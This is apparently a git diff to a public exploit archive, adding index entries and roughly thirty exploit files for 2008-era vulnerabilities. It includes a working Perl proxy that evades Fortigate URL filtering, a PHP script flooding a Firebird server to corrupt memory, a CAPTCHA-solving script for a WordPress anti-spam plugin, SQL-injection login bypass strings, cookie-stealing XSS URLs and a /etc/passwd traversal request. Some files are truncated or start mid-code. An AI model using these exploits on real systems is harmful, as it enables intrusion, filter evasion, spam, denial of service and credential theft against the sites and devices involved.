diff --git a/files.csv b/files.csv
index 5ba25f783..f8b91ca39 100755
--- a/files.csv
+++ b/files.csv
@@ -27841,3 +27841,48 @@ id,file,description,date,author,platform,type,port
31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow Vulnerability",2008-01-11,anonymous,windows,remote,0
31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0
31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0
+31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate CRLF Characters URL Filtering Bypass Vulnerability",2008-01-14,Danux,hardware,remote,0
+31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0
+31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0
+31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0
+31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0
+31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass Vulnerability",2008-01-16,nnposter,hardware,remote,0
+31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0
+31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0
+31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
+31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0
+31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0
+31039,platforms/windows/remote/31039.txt,"BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability",2008-01-19,"Oliver Karow",windows,remote,0
+31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 ActiveX Control Buffer Overflow Vulnerabilities",2008-01-20,rgod,windows,remote,0
+31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0
+31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b 'upload.asp' Cross-Site Scripting Vulnerability",2008-01-21,Doz,asp,webapps,0
+31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router Cross-Site Request Forgery Vulnerability",2008-01-21,WarGame,cgi,webapps,0
+31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template 'gallery' Parameter Cross-Site Scripting Vulnerability",2008-01-21,trew,php,webapps,0
+31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 'ffile' Parameter Remote File Include Vulnerability",2008-01-21,anonymous,php,webapps,0
+31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 ActiveX Control 'ChatRoom()' Buffer Overflow Vulnerability",2008-01-09,Knell,windows,remote,0
+31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 'txt' Parameter Cross-Site Scripting Vulnerability",2008-01-22,"Jan Fry",multiple,remote,0
+31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-01-22,RawSecurity.org,php,webapps,0
+31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 'attachments_header.php' Cross-Site Scripting Vulnerability",2008-01-22,NBBN,php,webapps,0
+31050,platforms/multiple/remote/31050.php,"Firebird <= 2.0.3 Relational Database 'protocol.cpp' XDR Protocol Remote Memory Corruption Vulnerability",2008-01-28,"Damian Frizza",multiple,remote,0
+31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure Vulnerability",2008-01-19,"Gerry Eisenhaur",linux,remote,0
+31052,platforms/linux/remote/31052.java,"Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability",2008-01-22,"Stefano Di Paola",linux,remote,0
+31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
+31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
+31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
+31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
+31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
+31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
+31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 'index.php' Cross-Site Scripting Vulnerability",2008-01-25,"Omer Singer",php,webapps,0
+31061,platforms/php/webapps/31061.txt,"trixbox 2.4.2 user/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
+31062,platforms/php/webapps/31062.txt,"trixbox 2.4.2 maint/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
+31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 pref.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
+31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 search.php adv Parameter XSS",2008-01-25,"Omer Singer",php,webapps,0
+31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 'report_type' Cross-Site Scripting Vulnerability",2008-01-26,nnposter,php,webapps,0
+31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module 'connector.php' Cross-Site Scripting Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
+31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 'install.php' Local File Include Vulnerability",2008-01-28,p4imi0,php,webapps,0
+31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility Arbitrary File Upload Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
+31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 'index.php' Cross-Site Scripting Vulnerability",2008-01-28,jekil,php,webapps,0
+31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page SQL Injection Vulnerability",2008-01-28,T_L_O_T_D,asp,webapps,0
+31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Include Vulnerability",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
+31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 FileUpload Class Unauthorized File Upload Vulnerability",2007-01-05,titon,windows,remote,0
+31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 'add1' Parameter Cross-Site Scripting Vulnerability",2008-01-29,"Brendan M. Hickey",java,webapps,0
diff --git a/platforms/asp/webapps/31042.txt b/platforms/asp/webapps/31042.txt
new file mode 100755
index 000000000..280f73787
--- /dev/null
+++ b/platforms/asp/webapps/31042.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27368/info
+
+MegaBBS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MegaBBS 1.5.14b is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/profile-upload/upload.asp?target=code
\ No newline at end of file
diff --git a/platforms/asp/webapps/31055.txt b/platforms/asp/webapps/31055.txt
new file mode 100755
index 000000000..96580c393
--- /dev/null
+++ b/platforms/asp/webapps/31055.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27419/info
+
+Web Wiz Forums, NewsPad, and Rich Text Editor are prone to a remote information-disclosure vulnerability because they fail to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to retrieve arbitrary files in the context of the webserver process. Information obtained may aid in further attacks; other attacks are also possible.
+
+This issue affects Forums 9.07, NewsPad 1.02, and Rich Text Editor 4.0; other versions may also be vulnerable.
+
+http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\
\ No newline at end of file
diff --git a/platforms/asp/webapps/31058.txt b/platforms/asp/webapps/31058.txt
new file mode 100755
index 000000000..a08c3905b
--- /dev/null
+++ b/platforms/asp/webapps/31058.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27450/info
+
+Pre Hotel and Resorts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Passing the following will bypass the authentication process:
+
+' or '
\ No newline at end of file
diff --git a/platforms/asp/webapps/31059.txt b/platforms/asp/webapps/31059.txt
new file mode 100755
index 000000000..1089dfb0a
--- /dev/null
+++ b/platforms/asp/webapps/31059.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27452/info
+
+E-SMART CART is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following exploit information is available:
+
+Passing:
+
+' or '
+
+will bypass the authentication process.
\ No newline at end of file
diff --git a/platforms/asp/webapps/31070.txt b/platforms/asp/webapps/31070.txt
new file mode 100755
index 000000000..2e3608a51
--- /dev/null
+++ b/platforms/asp/webapps/31070.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27474/info
+
+ASPired2Protect is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following exploit information is available:
+
+Passing:
+
+' or '
+
+will bypass the authentication process.
\ No newline at end of file
diff --git a/platforms/cgi/webapps/31043.txt b/platforms/cgi/webapps/31043.txt
new file mode 100755
index 000000000..af4d0d92b
--- /dev/null
+++ b/platforms/cgi/webapps/31043.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27374/info
+
+Alice Gate2 Plus Wi-Fi routers are prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit this issue to alter administrative configuration on affected devices. Specifically, altering the wireless encryption settings on devices has been demonstrated. Other attacks may also be possible.
+
+http://www.example.com/cp06_wifi_m_nocifr.cgi?wlChannel=Auto&wlRadioEnable=on
\ No newline at end of file
diff --git a/platforms/cgi/webapps/31071.txt b/platforms/cgi/webapps/31071.txt
new file mode 100755
index 000000000..466dfbb23
--- /dev/null
+++ b/platforms/cgi/webapps/31071.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27475/info
+
+VB Marketing is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to include local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
+
+http://www.example.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00
\ No newline at end of file
diff --git a/platforms/hardware/remote/31026.pl b/platforms/hardware/remote/31026.pl
new file mode 100755
index 000000000..02c0eed00
--- /dev/null
+++ b/platforms/hardware/remote/31026.pl
@@ -0,0 +1,222 @@
+source: http://www.securityfocus.com/bid/27276/info
+
+Fortinet Fortigate is prone to a vulnerability that can allow attackers to bypass the device's URL filtering.
+
+An attacker can exploit this issue to view unauthorized websites, bypassing certain security restrictions. This may lead to other attacks.
+
+This issue affects Fortigate-1000 3.00; other versions may also be affected.
+
+NOTE: This issue may be related to the vulnerability described in BID 16599 (Fortinet Fortigate URL Filtering Bypass Vulnerability).
+
+#!/usr/bin/perl
+
+########################################
+# fortiGuard.pl v0.1 - http://www.macula-group.com/
+#
+# # URL Filtering Bypass proof of concept
+# Author: Daniel Regalado aka Danux... Hacker WannaBe!!! (only some
+minnor modifications from sinhack code)
+# Based on PoC from sinhack research labs -> sakeru.pl
+#
+#FortiGuard's URL blocking functionality can be bypassed by
+specially-crafted HTTP requests that are terminated by the CRLF
+character
+#instead of the LF characters and changing version of HTTP to 1.0
+without sending Host: Header and Fragmenting the GET and POST Requests
+#
+#Tested On: fortiGate-1000 3.00, build 040075,070111
+#
+#This code has been released Only for educational purposes. The author
+cannot be held responsible for any bad use.
+# Usage:
+# 1) perl fortiGuard.pl
+# 2) Configure your browser's proxy at localhost:5050
+# 3) Have fun.
+
+# --- Start Of Script---
+
+use strict;
+use URI;
+use IO::Socket;
+
+my $showOpenedSockets=1; #Activate the console logging
+my $debugging=0;
+
+
+my $server = IO::Socket::INET->new ( #Proxy Configuration
+ LocalPort => 5050, #Change the listening port here
+ Type => SOCK_STREAM,
+ Reuse => 1,
+ Listen => 10);
+
+binmode $server;
+print "Waiting for connections on port 5050 TCP...\n";
+
+while (my $browser = $server->accept()) { #When a connection occure...
+ binmode $browser;
+ my $method="";
+ my $content_length = 0;
+ my $content = 0;
+ my $accu_content_length = 0;
+ my $host;
+ my $hostAddr;
+ my $httpVer;
+ my $line;
+
+ while (my $browser_line = <$browser>) { #Get the Browser commands
+ unless ($method) {
+ ($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+)
++(\S+) +(\S+)/;
+
+ my $uri = URI->new($hostAddr);
+
+ $host = IO::Socket::INET->new ( #Opening the connexion to the
+remote host
+ PeerAddr=> $uri->host,
+ PeerPort=> $uri->port ) or die "couldn't open $hostAddr";
+
+
+ if ($showOpenedSockets) { #Connection logs
+ #print "Source:".$browser->peerhost."\n";
+ my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) =
+localtime(time);
+ $year += 1900;
+ $mon += 1;
+ printf ("\n%04d-%02d-%02d %02d:%02d:%02d
+",$year,$mon,$mday,$hour,$min,$sec);
+ print $browser->peerhost." -> ".$uri->host.":".$uri->port."
+$method ".$uri->path_query."\n";;
+ }
+
+ binmode $host;
+ my $char;
+ if ($method == "GET") { #Fragmention the "GET" query
+ foreach $char ('G','E','T',' ') { #I know, there is better
+way to do it,
+ print $host $char; #but I'm tired and lazy...
+ }
+ } elsif ($method == "POST") { #Fragmentation of "POST" query
+ foreach $char ('P','O','S','T',' ') {
+ print $host $char;
+ }
+ } else {
+ print $host "$method "; #For all the other methods, send
+them without modif
+ print "*";
+ }
+ $httpVer="HTTP/1.0"; #Forzando a version 1.0
+ print $host $uri->path_query . " $httpVer\r\n"; #Send the rest
+of the query (url and http version)
+ #next;
+ }
+
+ $content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;
+ $accu_content_length+=length $browser_line;
+
+ foreach $line (split('\n', $browser_line)) { #Fragment the Host query
+ if ($line =~ /^Host:/ ) {
+ #my $char="";
+ #my $word="";
+ #my $bogus="";
+ #($bogus,$word) = split(' ', $line);
+ #foreach $char ('H','o','s','t',':',' ') {
+ #print $host $char;
+ #}
+ #print $host $word."\r\n";
+
+ } else {
+ print $host "$line\r\n"; #For all the other lines, send
+them without modif
+ }
+
+ if ( $debugging == 1 && $method == "POST" ) {
+ print "$line\n";
+ }
+ }
+ #Danux Clave para terminar el Request y enviarlo al servidor
+web, de otra forma se queda esperando este ultimo la peticion
+ print $host "\r\n";
+
+
+ last if $browser_line =~ /^\s*$/ and $method ne 'POST';
+ if ($browser_line =~ /^\s*$/ and $method eq "POST") {
+ $content = 1;
+ last unless $content_length;
+ next;
+ }
+ #print length $browser_line . " - ";
+ if ($content) {
+ $accu_content_length+=length $browser_line;
+ last if $accu_content_length >= $content_length;
+ }
+ }
+
+ $content_length = 0;
+ $content = 0;
+ $accu_content_length = 0;
+
+ my $crcount=0;
+ my $totalcounter=0;
+ my $packetcount=0;
+
+ while ( my $host_line = <$host> ) { #Reception of the result from the server
+
+ $totalcounter+=length $host_line;
+ print $browser $host_line; #Send them back to the browser
+ #print $host_line if ( ! $content ); #Send them back to the browser
+ if ($host_line=~/Content-length: +(\d+)/i) {
+ $content_length = $1;
+ #print " * Expecting $content_length\n"; #if ($debugging);
+ }
+ if ($host_line =~ m/^\s*$/ and not $content) {
+ $content = 1;
+ #print " * Beginning of the data section\n";
+ }
+ if ($content) {
+ #$accu_content_length+=length $host_line;
+ if ($content_length) {
+ #print " * binary data section\n";
+ my $buffer;
+ my $buffersize = 512;
+ if ($content_length < $buffersize) { $buffersize = $content_length; }
+ while ( my $nbread = read($host, $buffer, $buffersize)) {
+ print "#";
+ $packetcount++;
+ $accu_content_length+=$nbread;
+ #last if $accu_content_length >= $content_length;
+ print $browser $buffer; #Send them back to the browser
+ #print $buffer;
+ #print "\n(#$packetcount) ";
+ #print "total: $totalcounter content_length:
+$content_length acc: $accu_content_length\t";
+ my $tmp1 = $content_length - $accu_content_length;
+ #print "length-accu= $tmp1\n";
+
+ if ($tmp1 < $buffersize) {
+ $buffersize = $tmp1;
+ #print "new buffersize = $buffersize\n";
+ }
+ }
+ #print "Out of the content while\n";
+ }
+ }
+
+ #print "(#$packetcount) ";
+ #print "total: $totalcounter content_length: $content_length
+acc: $accu_content_length\t";
+ #my $tmp1 = $content_length - $accu_content_length;
+ #print "length-accu= $tmp1\n";
+ last if ($accu_content_length >= $content_length and $content ==
+1 and $content_length);
+ }
+ #print "\nOut for a while\n";
+
+
+ if ($browser) { $browser -> close; } #Closing connection to the browser
+ if ($host) { $host -> close; } #Closion connection to the server
+
+}
+
+# --- EOF ---
+
+
diff --git a/platforms/hardware/remote/31031.txt b/platforms/hardware/remote/31031.txt
new file mode 100755
index 000000000..de428c49f
--- /dev/null
+++ b/platforms/hardware/remote/31031.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/27309/info
+
+8e6 R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters.
+
+Attackers can exploit this issue by sending specially crafted HTTP request packets for an arbitrary website. Successful exploits allow attackers to view sites that the device is meant to block access to. This could aid in further attacks.
+
+R3000 Internet Filter 2.0.05.33 is vulnerable; other versions may also be affected.
+
+packet 1: GE
+packet 2: T / HTTP/1.0\r\n
+
+
+
+
+packet 1: GET / HTTP/1.0
+X-SomeHeader: ...
+....
+
+packet 2: X-SomeOtherHeader: ....
+Host: www.example.com
+...
\ No newline at end of file
diff --git a/platforms/java/webapps/31073.html b/platforms/java/webapps/31073.html
new file mode 100755
index 000000000..fc8912f91
--- /dev/null
+++ b/platforms/java/webapps/31073.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27490/info
+
+Banner Student is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Banner Student 7.3 is vulnerable; other versions may also be affected.
+
+Banner Vulnerability Test Case
Enter a new emergency contact. When finished, Submit Changes.
\ No newline at end of file
diff --git a/platforms/linux/remote/31051.txt b/platforms/linux/remote/31051.txt
new file mode 100755
index 000000000..bb1c661ec
--- /dev/null
+++ b/platforms/linux/remote/31051.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27406/info
+
+Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files.
+
+Attackers can exploit this issue to gain access to potentially sensitive information that could aid in further attacks.
+
+Firefox 2.0.0.11 is vulnerable; other versions may also be affected.
+
+NOTE: For an exploit to succeed, a user must have an addon installed that does not store its contents in a '.jar' file. The attacker would have to target a specific addon that uses "flat" packaging.
+
+
\ No newline at end of file
diff --git a/platforms/linux/remote/31052.java b/platforms/linux/remote/31052.java
new file mode 100755
index 000000000..df7a26443
--- /dev/null
+++ b/platforms/linux/remote/31052.java
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/27409/info
+
+Apache 'mod_negotiation' is prone to an HTML-injection and an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted; other attacks are also possible.
+
+// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
+// Compile with flex compiler
+package
+{
+ import flash.display.Sprite;
+ import flash.net.*
+ public class TestXss extends flash.display.Sprite {
+ public function TestXss(){
+ var r:URLRequest = new URLRequest('http://victim/#alert(123)');
+
+ r.method = 'POST';
+ r.data = unescape('test');
+ r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg; q=0'));
+
+ navigateToURL(r, '_self');
+
+ }
+ }
+}
diff --git a/platforms/multiple/remote/31047.txt b/platforms/multiple/remote/31047.txt
new file mode 100755
index 000000000..f7fe328b6
--- /dev/null
+++ b/platforms/multiple/remote/31047.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27394/info
+
+Novemberborn sIFR is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to sIFR 2.0.3 and 3r278 are vulnerable.
+
+https://www.example.com/.swf?txt=click me! http://www.example.com/fonts/FuturaLt.swf?txt=%3Ca%20href=%22javascript:alert(document.cookie)%22%3Eclick%20me!%3C/a%3E&textalign=left&offsetTop=-2&textcolor=
\ No newline at end of file
diff --git a/platforms/multiple/remote/31050.php b/platforms/multiple/remote/31050.php
new file mode 100755
index 000000000..49be04e0f
--- /dev/null
+++ b/platforms/multiple/remote/31050.php
@@ -0,0 +1,73 @@
+source: http://www.securityfocus.com/bid/27403/info
+
+Firebird is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to overflow a buffer and to corrupt process memory.
+
+Attackers may be able to execute arbitrary machine code in the context of an affected application. Failed exploit attempts will likely result in a denial-of-service condition.
+
+(data->p_data_request));
+* MAP(xdr_short, reinterpret_cast(data->p_data_incarnation));
+* MAP(xdr_short, reinterpret_cast(data->p_data_transaction));
+* MAP(xdr_short, reinterpret_cast(data->p_data_message_number));
+* return xdr_request(xdrs, data->p_data_request,
+* data->p_data_message_number,
+* data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
+*
+* Firebird Connect Packet
+* * 0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00 ..............E.
+* 0x0010 00 BC 00 00 00 00 40 06-00 25 C0 A8 7C 63 C0 A8 .ј....@..%АЁ|cАЁ
+* 0x0020 7C 63 0B EA 0E 94 00 00-00 01 00 00 00 01 50 10 |c.к.?........P.
+* 0x0030 40 00 00 00 00 00 00 00-00 01 00 00 00 13 00 00 @...............
+* 0x0040 00 02 00 00 00 1D 00 00-00 3C 43 3A 5C 50 72 6F ..........
+* 0x00A0 00 00 ..
+*
+*/
+ $___suntzu = "\x00\x00\x00\x4a" . str_repeat( "\x4a" , 3000);
+ for ($temp = 0; $temp < 5; $temp ++){
+ $___zuntzu = fsockopen('192.168.124.99',3050);
+ fwrite($___zuntzu , $___suntzu);
+ fclose($___zuntzu );
+ sleep(1);
+ }
+?>
diff --git a/platforms/osx/dos/31057.html b/platforms/osx/dos/31057.html
new file mode 100755
index 000000000..7172cd4c3
--- /dev/null
+++ b/platforms/osx/dos/31057.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27442/info
+
+Apple iPhone is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue by enticing an unsuspecting user to view a maliciously crafted webpage. Successful attacks cause a kernel panic, crashing the device. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.
+
+iPhone 1.1.2 and 1.1.3 are affected; other versions may also be vulnerable.
+
+
\ No newline at end of file
diff --git a/platforms/php/remote/31053.php b/platforms/php/remote/31053.php
new file mode 100755
index 000000000..aa5c9e4c6
--- /dev/null
+++ b/platforms/php/remote/31053.php
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27413/info
+
+PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
+
+Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
+
+The issue affects PHP 5.2.5 and 5.2.4.
+
+var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
\ No newline at end of file
diff --git a/platforms/php/webapps/31027.txt b/platforms/php/webapps/31027.txt
new file mode 100755
index 000000000..0bbd8d283
--- /dev/null
+++ b/platforms/php/webapps/31027.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27282/info
+
+pMachine Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The issues affect pMachine Pro 2.4.1; other versions may also be vulnerable.
+
+NOTE: pMachine Pro has been replaced by ExpressionEngine. The vendor recommends upgrading.
+
+http://www.example.com/pm/language/spanish/preferences.php?L_PREF_NAME[855]=
+
diff --git a/platforms/php/webapps/31028.txt b/platforms/php/webapps/31028.txt
new file mode 100755
index 000000000..335f011e6
--- /dev/null
+++ b/platforms/php/webapps/31028.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27286/info
+
+Article Dashboard is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/admin/login.php?user=admin'-- | /*
\ No newline at end of file
diff --git a/platforms/php/webapps/31029.pl b/platforms/php/webapps/31029.pl
new file mode 100755
index 000000000..954559936
--- /dev/null
+++ b/platforms/php/webapps/31029.pl
@@ -0,0 +1,60 @@
+source: http://www.securityfocus.com/bid/27287/info
+
+Peter's Math Anti-Spam for WordPress is prone to a security-bypass vulnerability.
+
+This issue occurs when presenting a visitor with challenge data to determine if they are a legitimate user or an automaton. The challenge data is poorly obfuscated and can be interpreted by script code.
+
+Attackers can leverage this issue to bypass the security measures provided by the plugin via an automated script. This could aid in spam distribution and other attacks.
+
+Peter's Math Anti-Spam for WordPress 0.1.6 is vulnerable; other versions may also be affected.
+
+$ cat math_spam.pl
+#!/usr/bin/perl -w
+
+require bytes;
+
+ my $buffer;
+ my $number;
+ my $op1;
+ my $op2;
+
+ my %numberPrints = ("0045", 0,
+ "00c5", 1,
+ "0485", 2,
+ "4309", 3,
+ "0205", 4,
+ "0847", 5,
+ "0601", 6,
+ "0644", 7,
+ "0405", 8,
+ "0031", 9);
+
+ my %numberSizes = ( 0, 4045,
+ 1, 3983,
+ 2, 4431,
+ 3, 4250,
+ 4, 4595,
+ 5, 5389,
+ 6, 4949,
+ 7, 4436,
+ 8, 4584,
+ 9, 5009);
+
+ my $PLUS_SIZE = 7365;
+
+ open (INFILE, "<$ARGV[0]");
+ binmode(INFILE);
+ sysseek(INFILE, 14, 0); #That "0" third argument makes seeking
+absoulte
+ sysread(INFILE, $buffer, 2);
+ #$number = sprintf("%x%x", map {ord($_)}
+split(//,substr($buffer,0,2)));
+ $number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
+ $op1 = $numberPrints{$number};
+ sysseek(INFILE, $numberSizes{$op1} + $PLUS_SIZE - 2, 1); #That
+third "1" argument makes seeking relative
+ sysread(INFILE, $buffer, 2);
+ $number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
+ $op2 = $numberPrints{$number};
+ print $op1 . " + " . $op2 . " = " . ($op1+$op2) . "\n";
+ close(INFILE);
diff --git a/platforms/php/webapps/31030.pl b/platforms/php/webapps/31030.pl
new file mode 100755
index 000000000..4e532043c
--- /dev/null
+++ b/platforms/php/webapps/31030.pl
@@ -0,0 +1,102 @@
+source: http://www.securityfocus.com/bid/27291/info
+
+SpamBam is prone to a security-bypass vulnerability because client-accessible data can be used to calculate verification keys.
+
+Attackers can exploit this issue to submit arbitrary form data via automated scripts and distribute spam.
+
+#!/usr/bin/perl -w
+
+# Defeating SpamBam exploit
+# by Jose Palazon (josem.palazon@gmail.com) (a.k.a. palako)
+
+# Vulnerable software:
+# SpamBam (http://wordpress.org/extend/plugins/spambam/) by Gareth Heyes
+
+# Vulnerability:
+# No matter how hard you ofuscate or encrypt your code, never, under no
+circunstances, rely
+# any security aspect on the client. Never!
+
+# How the plugin works:
+# It generates a pseudo-random code both on the client and the server to
+generate a key.
